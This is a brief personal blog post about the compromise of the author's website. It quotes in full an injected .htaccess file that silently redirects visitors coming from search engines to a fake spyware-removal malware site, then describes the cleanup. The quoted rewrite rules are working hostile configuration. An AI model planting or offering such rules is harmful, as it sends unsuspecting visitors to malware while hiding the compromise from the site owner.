So this website was compromised

So this website (mattmullen.net) was compromised recently, oddly enough. I guess those hackers were just too excited by the prospect of my traffic at upwards of 2 hits per day redirected to their malware site. It's quite a honeypot.

Anyway, here's all they did: they injected an .htaccess in the root with the following data:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]

RewriteRule .* http://[IP Address of malware site]/in.html?s=xx [R,L]

Which made my site accessable by direct link or bookmark, but you couldn't click-through from a major search engine without getting redirected to a fake spyware-removal app.

I've replaced the bad files, changed my passwords, and scanned all my machines for malware (0 hits), so my best guess is that they somehow got my ftp address, or compromised the host company and infected many of their users.